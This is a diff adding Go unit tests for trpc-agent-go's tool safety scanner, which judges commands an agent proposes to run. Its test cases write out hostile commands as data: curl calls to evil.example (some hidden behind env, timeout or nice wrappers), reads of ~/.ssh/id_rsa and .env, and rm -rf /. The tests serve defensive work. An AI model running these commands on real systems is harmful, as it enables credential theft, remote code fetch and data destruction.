+		},
+		{
+			name: "timeout signal short",
+			argv: []string{"timeout", "-s", "KILL", "5", "curl", "evil.example"},
+			want: []string{"curl", "evil.example"},
+		},
+		{
+			name: "timeout kill after short",
+			argv: []string{"timeout", "-k", "1", "5", "curl", "evil.example"},
+			want: []string{"curl", "evil.example"},
+		},
+		{
+			name: "timeout signal long assignment",
+			argv: []string{"timeout", "--signal=KILL", "5", "curl", "evil.example"},
+			want: []string{"curl", "evil.example"},
+		},
+		{
+			name: "timeout without command",
+			argv: []string{"timeout", "5"},
+			want: nil,
+		},
+		{
+			name: "nice adjustment short",
+			argv: []string{"nice", "-n", "5", "curl", "evil.example"},
+			want: []string{"curl", "evil.example"},
+		},
+		{
+			name: "nice adjustment long",
+			argv: []string{"nice", "--adjustment", "5", "curl", "evil.example"},
+			want: []string{"curl", "evil.example"},
+		},
+		{
+			name: "non wrapper",
+			argv: []string{"go", "test", "./..."},
+			want: []string{"go", "test", "./..."},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := unwrapCommand(tt.argv); !slices.Equal(got, tt.want) {
+				t.Fatalf("unwrapCommand(%q) = %q, want %q", tt.argv, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestContainsNetworkCommandVariants(t *testing.T) {
+	tests := []struct {
+		name string
+		argv []string
+		want bool
+	}{
+		{
+			name: "direct",
+			argv: []string{"curl", "evil.example"},
+			want: true,
+		},
+		{
+			name: "env options and assignment",
+			argv: []string{"env", "-u", "TOKEN", "-C", "/tmp", "MODE=test", "curl", "evil.example"},
+			want: true,
+		},
+		{
+			name: "command flags",
+			argv: []string{"command", "-p", "curl", "evil.example"},
+			want: true,
+		},
+		{
+			name: "timeout short options",
+			argv: []string{"timeout", "-s", "KILL", "-k", "1", "5", "curl", "evil.example"},
+			want: true,
+		},
+		{
+			name: "timeout long assignment",
+			argv: []string{"timeout", "--signal=KILL", "5", "curl", "evil.example"},
+			want: true,
+		},
+		{
+			name: "nice short adjustment",
+			argv: []string{"nice", "-n", "5", "curl", "evil.example"},
+			want: true,
+		},
+		{
+			name: "nice long adjustment",
+			argv: []string{"nice", "--adjustment", "5", "curl", "evil.example"},
+			want: true,
+		},
+		{
+			name: "wrapper chain",
+			argv: []string{"env", "MODE=test", "timeout", "5", "nice", "-n", "1", "command", "--", "curl", "evil.example"},
+			want: true,
+		},
+		{
+			name: "non wrapper",
+			argv: []string{"go", "test", "./..."},
+			want: false,
+		},
+		{
+			name: "empty",
+			argv: nil,
+			want: false,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := containsNetworkCommand(tt.argv); got != tt.want {
+				t.Fatalf("containsNetworkCommand(%q) = %v, want %v", tt.argv, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestNormalizeShellScriptVariants(t *testing.T) {
+	tests := []struct {
+		name   string
+		script string
+		want   string
+	}{
+		{
+			name:   "CRLF",
+			script: "echo one\r\necho two",
+			want:   "echo one ; echo two",
+		},
+		{
+			name:   "escaped LF",
+			script: "echo one\\\ntwo",
+			want:   "echo one two",
+		},
+		{
+			name:   "escaped CRLF",
+			script: "echo one\\\r\ntwo",
+			want:   "echo one two",
+		},
+		{
+			name:   "newline in single quotes",
+			script: "echo 'one\ntwo'",
+			want:   "echo 'one two'",
+		},
+		{
+			name:   "newline in double quotes",
+			script: "echo \"one\ntwo\"",
+			want:   "echo \"one two\"",
+		},
+		{
+			name:   "blank line",
+			script: "echo one\n\necho two",
+			want:   "echo one ; echo two",
+		},
+		{
+			name:   "leading blank lines",
+			script: "\n\necho one",
+			want:   "echo one",
+		},
+		{
+			name:   "separator before newline",
+			script: "echo one;\necho two",
+			want:   "echo one;echo two",
+		},
+		{
+			name:   "separator after newline",
+			script: "echo one\n; echo two",
+			want:   "echo one; echo two",
+		},
+		{
+			name:   "pipe before newline",
+			script: "echo one |\nwc -l",
+			want:   "echo one |wc -l",
+		},
+		{
+			name:   "trailing newline",
+			script: "echo one\n",
+			want:   "echo one",
+		},
+		{
+			name:   "only newlines",
+			script: "\r\n\n",
+			want:   "",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := normalizeShellScript(tt.script); got != tt.want {
+				t.Fatalf("normalizeShellScript(%q) = %q, want %q", tt.script, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestPathCandidatesVariants(t *testing.T) {
+	tests := []struct {
+		name string
+		arg  string
+		want []string
+	}{
+		{name: "empty", arg: "   ", want: nil},
+		{name: "ordinary", arg: " README.md ", want: []string{"README.md"}},
+		{
+			name: "option key value",
+			arg:  `"--config=/etc/app"`,
+			want: []string{"--config=/etc/app", "/etc/app"},
+		},
+		{name: "non option key value", arg: "MODE=test", want: []string{"MODE=test"}},
+		{name: "empty option value", arg: "--config=", want: []string{"--config="}},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := pathCandidates(tt.arg); !slices.Equal(got, tt.want) {
+				t.Fatalf("pathCandidates(%q) = %q, want %q", tt.arg, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestHostOfVariants(t *testing.T) {
+	tests := []struct {
+		name string
+		raw  string
+		want string
+	}{
+		{name: "scheme less", raw: "evil.example/install.sh", want: "evil.example"},
+		{name: "quoted scheme less", raw: `'LOCALHOST:8080/path'`, want: "localhost"},
+		{name: "explicit scheme", raw: "https://API.GITHUB.COM/repos", want: "api.github.com"},
+		{name: "bad URL", raw: "http://[::1", want: ""},
+		{name: "empty", raw: "", want: ""},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := hostOf(tt.raw); got != tt.want {
+				t.Fatalf("hostOf(%q) = %q, want %q", tt.raw, got, tt.want)
+			}
+		})
+	}
+}
+
 type countingWriter struct {
 	calls int
 	data  []byte
@@ -1009,6 +1527,18 @@ func (errorWriter) Write([]byte) (int, error) {
 func strconvQuote(s string) string {
 	b, _ := json.Marshal(s)
 	return string(b)
+}
+
+func reportHasRule(report Report, ruleID string) bool {
+	if report.RuleID == ruleID {
+		return true
+	}
+	for _, finding := range report.Findings {
+		if finding.RuleID == ruleID {
+			return true
+		}
+	}
+	return false
 }
 
 func (w *countingWriter) Write(p []byte) (int, error) {

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -1,0 +1,1018 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"errors"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+)
+
+func TestScanRequiredSamples(t *testing.T) {
+	policy := DefaultPolicy()
+	tests := []struct {
+		name     string
+		req      Request
+		decision Decision
+		ruleID   string
+	}{
+		{
+			name: "safe go test",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "go test ./...",
+			},
+			decision: DecisionAllow,
+		},
+		{
+			name: "dangerous delete",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "rm -rf /",
+			},
+			decision: DecisionDeny,
+			ruleID:   "dangerous.rm_rf",
+		},
+		{
+			name: "read key",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "cat ~/.ssh/id_rsa",
+			},
+			decision: DecisionDeny,
+			ruleID:   "sensitive.path_access",
+		},
+		{
+			name: "non whitelist network",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "curl https://evil.example/install.sh",
+			},
+			decision: DecisionDeny,
+			ruleID:   "network.non_whitelisted_domain",
+		},
+		{
+			name: "whitelist network",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "curl https://api.github.com/repos/trpc-group/trpc-agent-go",
+			},
+			decision: DecisionAllow,
+		},
+		{
+			name: "shell wrapper bypass",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "bash -c 'curl https://evil.example/x'",
+			},
+			decision: DecisionDeny,
+			ruleID:   "shell.bypass",
+		},
+		{
+			name: "pipeline command",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "cat README.md | wc -l",
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "shell.pipeline_review",
+		},
+		{
+			name: "dependency install",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "npm install left-pad",
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "dependency.environment_change",
+		},
+		{
+			name: "long running sleep",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "sleep 9999",
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "resource.long_sleep",
+		},
+		{
+			name: "large output",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "yes x | head -c 9999999",
+			},
+			decision: DecisionDeny,
+			ruleID:   "resource.large_output",
+		},
+		{
+			name: "hostexec long session",
+			req: Request{
+				ToolName:   "exec_command",
+				Backend:    BackendHostExec,
+				Command:    "tail -f app.log",
+				TTY:        true,
+				Background: true,
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "hostexec.long_session",
+		},
+		{
+			name: "ask human review",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "python -c 'import subprocess; subprocess.run([\"go\", \"test\", \"./...\"])'",
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "import subprocess; subprocess.run(['go', 'test', './...'])",
+				}},
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "codeexec.host_command_bridge",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(tt.req, policy)
+			if report.Decision != tt.decision {
+				t.Fatalf("decision = %q, want %q; report: %+v",
+					report.Decision, tt.decision, report)
+			}
+			if tt.ruleID != "" && report.RuleID != tt.ruleID {
+				t.Fatalf("rule id = %q, want %q; report: %+v",
+					report.RuleID, tt.ruleID, report)
+			}
+			if err := ValidateReport(report); err != nil {
+				t.Fatalf("report missing required fields: %v", err)
+			}
+		})
+	}
+}
+
+func TestLoadPolicyChangesNetworkAllowlistWithoutCode(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "tool_safety_policy.yaml")
+	content := []byte(`
+network_allowlist:
+  - example.com
+denied_paths:
+  - .env
+`)
+	if err := os.WriteFile(path, content, 0o600); err != nil {
+		t.Fatal(err)
+	}
+	policy, err := LoadPolicy(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "curl https://example.com/file",
+	}, policy)
+	if report.Decision != DecisionAllow {
+		t.Fatalf("decision = %q, want allow; report: %+v", report.Decision, report)
+	}
+	report = Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "curl https://api.github.com/repos/x/y",
+	}, policy)
+	if report.Decision != DecisionDeny {
+		t.Fatalf("decision = %q, want deny; report: %+v", report.Decision, report)
+	}
+}
+
+func TestLoadPolicyCanDisablePipelineReview(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "tool_safety_policy.yaml")
+	content := []byte(`
+review_shell_pipelines: false
+allowed_commands:
+  - cat
+  - wc
+`)
+	if err := os.WriteFile(path, content, 0o600); err != nil {
+		t.Fatal(err)
+	}
+	policy, err := LoadPolicy(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "cat README.md | wc -l",
+	}, policy)
+	if report.Decision != DecisionAllow {
+		t.Fatalf("decision = %q, want allow; report: %+v", report.Decision, report)
+	}
+}
+
+func TestLoadPolicyCanDisableParseErrorDeny(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "tool_safety_policy.json")
+	content := []byte(`{
+  "deny_on_parse_error": false,
+  "allowed_commands": ["echo"]
+}`)
+	if err := os.WriteFile(path, content, 0o600); err != nil {
+		t.Fatal(err)
+	}
+	policy, err := LoadPolicy(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "echo 'unterminated",
+	}, policy)
+	if report.Decision != DecisionAsk || report.RuleID != "shellsafe.parse_error" {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestPolicyZeroValueKeepsConservativeDefaults(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "cat README.md | wc -l",
+	}, Policy{})
+	if report.Decision != DecisionNeedsHumanReview ||
+		report.RuleID != "shell.pipeline_review" {
+		t.Fatalf("zero-value policy should inherit pipeline review: %+v", report)
+	}
+}
+
+func TestDefaultPolicyPreservesProgrammaticFalseOverrides(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.ReviewShellPipelines = false
+	policy.DenyOnParseError = false
+
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "cat README.md | wc -l",
+	}, policy)
+	if report.Decision != DecisionAllow {
+		t.Fatalf("pipeline decision = %q, want allow; report: %+v", report.Decision, report)
+	}
+
+	report = Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "echo 'unterminated",
+	}, policy)
+	if report.Decision != DecisionAsk {
+		t.Fatalf("parse decision = %q, want ask; report: %+v", report.Decision, report)
+	}
+}
+
+func TestLoadPolicyErrors(t *testing.T) {
+	if _, err := LoadPolicy(filepath.Join(t.TempDir(), "missing.yaml")); err == nil {
+		t.Fatal("LoadPolicy missing file error = nil")
+	}
+
+	badJSON := filepath.Join(t.TempDir(), "bad.json")
+	if err := os.WriteFile(badJSON, []byte(`{`), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := LoadPolicy(badJSON); err == nil {
+		t.Fatal("LoadPolicy bad JSON error = nil")
+	}
+
+	badExt := filepath.Join(t.TempDir(), "policy.toml")
+	if err := os.WriteFile(badExt, []byte(`allowed_commands = []`), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := LoadPolicy(badExt); err == nil {
+		t.Fatal("LoadPolicy unsupported extension error = nil")
+	}
+}
+
+func TestPermissionPolicyBlocksAndAudits(t *testing.T) {
+	args := []byte(`{"command":"cat .env","timeout_sec":10}`)
+	var audit bytes.Buffer
+	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditWriter(&audit))
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: args,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("action = %q, want deny", decision.Action)
+	}
+	var event AuditEvent
+	if err := json.Unmarshal(bytes.TrimSpace(audit.Bytes()), &event); err != nil {
+		t.Fatalf("audit was not json: %v\n%s", err, audit.String())
+	}
+	if event.ToolName != "workspace_exec" ||
+		event.Decision != DecisionDeny ||
+		event.RuleID != "sensitive.path_access" ||
+		!event.Blocked {
+		t.Fatalf("unexpected audit event: %+v", event)
+	}
+}
+
+func TestPermissionPolicyMapsReviewToAsk(t *testing.T) {
+	args := []byte(`{"command":"npm install left-pad"}`)
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: args,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAsk {
+		t.Fatalf("action = %q, want ask", decision.Action)
+	}
+}
+
+func TestPermissionPolicyUsesExtensionRequestParser(t *testing.T) {
+	parserCalled := false
+	policy := NewPermissionPolicy(
+		DefaultPolicy(),
+		WithPermissionRequestParser(
+			"mcp_shell",
+			func(req *tool.PermissionRequest) (Request, bool, error) {
+				parserCalled = true
+				return Request{
+					ToolName: req.ToolName,
+					Backend:  "mcp",
+					Command:  "cat .env",
+				}, true, nil
+			},
+		),
+	)
+	decision, err := policy.CheckToolPermission(
+		context.Background(),
+		&tool.PermissionRequest{ToolName: "mcp_shell"},
+	)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !parserCalled || decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("parserCalled = %v, decision = %+v", parserCalled, decision)
+	}
+}
+
+func TestPermissionPolicyAllowsUnknownToolAndNilRequest(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(context.Background(), nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("nil request action = %q, want allow", decision.Action)
+	}
+
+	decision, err = policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "unknown_tool",
+		Arguments: []byte(`{}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("unknown tool action = %q, want allow", decision.Action)
+	}
+}
+
+func TestPermissionPolicyInvalidArgsDeny(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny ||
+		!strings.Contains(decision.Reason, "invalid args") {
+		t.Fatalf("unexpected decision: %+v", decision)
+	}
+}
+
+func TestPermissionPolicyAuditPath(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "audit.jsonl")
+	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditPath(path))
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"cat .env"}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("action = %q, want deny", decision.Action)
+	}
+	b, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	var event AuditEvent
+	if err := json.Unmarshal(bytes.TrimSpace(b), &event); err != nil {
+		t.Fatalf("audit file was not json: %v\n%s", err, string(b))
+	}
+	if event.RuleID != "sensitive.path_access" {
+		t.Fatalf("unexpected audit event: %+v", event)
+	}
+}
+
+func TestPermissionPolicyAuditWriterError(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditWriter(errorWriter{}))
+	_, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"go test ./..."}`),
+	})
+	if err == nil {
+		t.Fatal("CheckToolPermission audit writer error = nil")
+	}
+}
+
+func TestNilPermissionPolicyFailsClosed(t *testing.T) {
+	var policy *PermissionPolicy
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"go test ./..."}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("action = %q, want deny", decision.Action)
+	}
+}
+
+func TestPermissionPolicyAllowsNullCodeBlocksNoop(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "execute_code",
+		Arguments: []byte(`{"code_blocks":null}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("action = %q, want allow", decision.Action)
+	}
+}
+
+func TestPermissionPolicyAllowsCodeExecBlocksAndDeniesBadBlocks(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "execute_code",
+		Arguments: []byte(`{"code_blocks":[{"language":"python","code":"print(1)"}]}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("valid code block action = %q, want allow", decision.Action)
+	}
+
+	decision, err = policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "execute_code",
+		Arguments: []byte(`{"code_blocks":42}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny ||
+		!strings.Contains(decision.Reason, "code_blocks") {
+		t.Fatalf("bad code block decision = %+v, want deny with code_blocks reason", decision)
+	}
+}
+
+func TestRequestFromPermissionRequestParsesExecMetadata(t *testing.T) {
+	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+		ToolName: "exec_command",
+		Arguments: []byte(`{
+			"command":"go test ./...",
+			"workdir":"/tmp/work",
+			"env":{"PATH":"/bin"},
+			"background":true,
+			"timeoutSec":12,
+			"pty":true
+		}`),
+		Metadata: tool.ToolMetadata{Destructive: true},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !ok || req.Backend != BackendHostExec || req.Cwd != "/tmp/work" ||
+		req.TimeoutSeconds != 12 || !req.Background || !req.TTY ||
+		!req.Metadata.Destructive || req.Env["PATH"] != "/bin" {
+		t.Fatalf("unexpected request: %+v", req)
+	}
+}
+
+func TestRequestFromPermissionRequestParsesTTYAndTimeoutSec(t *testing.T) {
+	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+		ToolName: "workspace_exec",
+		Arguments: []byte(`{
+			"command":"go test ./...",
+			"cwd":".",
+			"timeout_sec":7,
+			"tty":true
+		}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !ok || req.Backend != BackendWorkspaceExec || req.Cwd != "." ||
+		req.TimeoutSeconds != 7 || !req.TTY {
+		t.Fatalf("unexpected request: %+v ok=%v", req, ok)
+	}
+}
+
+func TestRequestFromPermissionRequestUsesDeclarationName(t *testing.T) {
+	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+		Declaration: &tool.Declaration{Name: "workspace_exec"},
+		Arguments:   []byte(`{"command":"go test ./...","cwd":"."}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !ok || req.ToolName != "workspace_exec" || req.Command != "go test ./..." ||
+		req.Cwd != "." || req.Backend != BackendWorkspaceExec {
+		t.Fatalf("unexpected request: %+v ok=%v", req, ok)
+	}
+}
+
+func TestParseCodeBlocksVariants(t *testing.T) {
+	blocks, err := parseCodeBlocks(json.RawMessage(`{"language":"python","code":"print(1)"}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(blocks) != 1 || blocks[0].Language != "python" {
+		t.Fatalf("unexpected object blocks: %+v", blocks)
+	}
+
+	inner := `[{"language":"bash","code":"echo ok"}]`
+	blocks, err = parseCodeBlocks(json.RawMessage(strconvQuote(inner)))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(blocks) != 1 || blocks[0].Language != "bash" {
+		t.Fatalf("unexpected string blocks: %+v", blocks)
+	}
+
+	if _, err := parseCodeBlocks(json.RawMessage(`"not-json"`)); err == nil {
+		t.Fatal("parseCodeBlocks invalid string error = nil")
+	}
+	if _, err := parseCodeBlocks(json.RawMessage(`42`)); err == nil {
+		t.Fatal("parseCodeBlocks scalar error = nil")
+	}
+	if _, err := parseCodeBlocks(json.RawMessage(`[{"language":42}]`)); err == nil {
+		t.Fatal("parseCodeBlocks malformed array error = nil")
+	}
+}
+
+func TestScanRedactsSecrets(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "echo OPENAI_API_KEY=sk-1234567890abcdef",
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny {
+		t.Fatalf("decision = %q, want deny", report.Decision)
+	}
+	if !report.Redacted {
+		t.Fatalf("report should indicate redaction")
+	}
+	raw, _ := json.Marshal(report)
+	if bytes.Contains(raw, []byte("sk-1234567890abcdef")) {
+		t.Fatalf("report leaked secret: %s", raw)
+	}
+}
+
+func TestScanMetadataEnvAndTelemetry(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "go test ./...",
+		Metadata: ToolMetadata{Destructive: true},
+		Env: map[string]string{
+			"PATH":    "/bin",
+			"BAD_ENV": "1",
+		},
+	}, DefaultPolicy())
+	if report.Decision != DecisionNeedsHumanReview ||
+		report.RuleID != "tool.metadata_destructive" {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+	attrs := report.SpanAttributes()
+	if attrs["tool.safety.decision"] != string(report.Decision) ||
+		attrs["tool.safety.risk_level"] != string(report.RiskLevel) ||
+		attrs["tool.safety.rule_id"] != report.RuleID ||
+		attrs["tool.safety.backend"] != report.Backend {
+		t.Fatalf("unexpected span attrs: %+v", attrs)
+	}
+	if len(report.Findings) < 2 {
+		t.Fatalf("expected metadata and env findings: %+v", report.Findings)
+	}
+}
+
+func TestValidateReportMissingFields(t *testing.T) {
+	tests := []struct {
+		name   string
+		report Report
+		want   string
+	}{
+		{
+			name:   "decision",
+			report: Report{},
+			want:   "missing decision",
+		},
+		{
+			name:   "risk",
+			report: Report{Decision: DecisionAllow},
+			want:   "missing risk_level",
+		},
+		{
+			name: "rule",
+			report: Report{
+				Decision:       DecisionDeny,
+				RiskLevel:      RiskHigh,
+				Recommendation: "fix it",
+			},
+			want: "missing rule_id",
+		},
+		{
+			name: "evidence",
+			report: Report{
+				Decision:       DecisionDeny,
+				RiskLevel:      RiskHigh,
+				RuleID:         "rule",
+				Recommendation: "fix it",
+			},
+			want: "missing evidence",
+		},
+		{
+			name: "recommendation",
+			report: Report{
+				Decision:  DecisionAllow,
+				RiskLevel: RiskLow,
+			},
+			want: "missing recommendation",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateReport(tt.report)
+			if err == nil || !strings.Contains(err.Error(), tt.want) {
+				t.Fatalf("ValidateReport() error = %v, want %q", err, tt.want)
+			}
+		})
+	}
+}
+
+func TestScanDeniedCWD(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "ls",
+		Cwd:      "~/.ssh",
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny || report.RuleID != "sensitive.cwd_access" {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestScanDeniedRootPath(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "go test ./...",
+		Cwd:      "/",
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny || report.RuleID != "sensitive.cwd_access" {
+		t.Fatalf("root cwd should be denied: %+v", report)
+	}
+
+	report = Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "cat /",
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny || report.RuleID != "sensitive.path_access" {
+		t.Fatalf("root path argument should be denied: %+v", report)
+	}
+}
+
+func TestScanAdditionalRuleBranches(t *testing.T) {
+	tests := []struct {
+		name   string
+		cmd    string
+		ruleID string
+	}{
+		{
+			name:   "recursive chmod",
+			cmd:    "chmod -R 777 .",
+			ruleID: "dangerous.recursive_chmod",
+		},
+		{
+			name:   "network command without target",
+			cmd:    "curl --head",
+			ruleID: "network.unresolved_target",
+		},
+		{
+			name:   "python large output",
+			cmd:    "python -c 'print(\"x\" * 9999999)'",
+			ruleID: "resource.large_output",
+		},
+		{
+			name:   "parallel high concurrency",
+			cmd:    "parallel -j 64 echo ::: a b c",
+			ruleID: "resource.high_concurrency",
+		},
+		{
+			name:   "infinite loop",
+			cmd:    "for ;; do echo x; done",
+			ruleID: "resource.infinite_loop",
+		},
+		{
+			name:   "windows system path delete",
+			cmd:    "rm -r C:/Windows",
+			ruleID: "dangerous.rm_rf",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  tt.cmd,
+			}, DefaultPolicy())
+			if report.RuleID != tt.ruleID {
+				t.Fatalf("rule id = %q, want %q; report: %+v",
+					report.RuleID, tt.ruleID, report)
+			}
+		})
+	}
+}
+
+func TestScanCodeExecAppliesRequestEnvelope(t *testing.T) {
+	tests := []struct {
+		name     string
+		req      Request
+		decision Decision
+		ruleID   string
+	}{
+		{
+			name: "denied cwd",
+			req: Request{
+				ToolName: "execute_code",
+				Backend:  BackendCodeExec,
+				Cwd:      "/",
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "print(1)",
+				}},
+			},
+			decision: DecisionDeny,
+			ruleID:   "sensitive.cwd_access",
+		},
+		{
+			name: "timeout exceeded",
+			req: Request{
+				ToolName:       "execute_code",
+				Backend:        BackendCodeExec,
+				TimeoutSeconds: DefaultPolicy().MaxTimeoutSeconds + 1,
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "print(1)",
+				}},
+			},
+			decision: DecisionDeny,
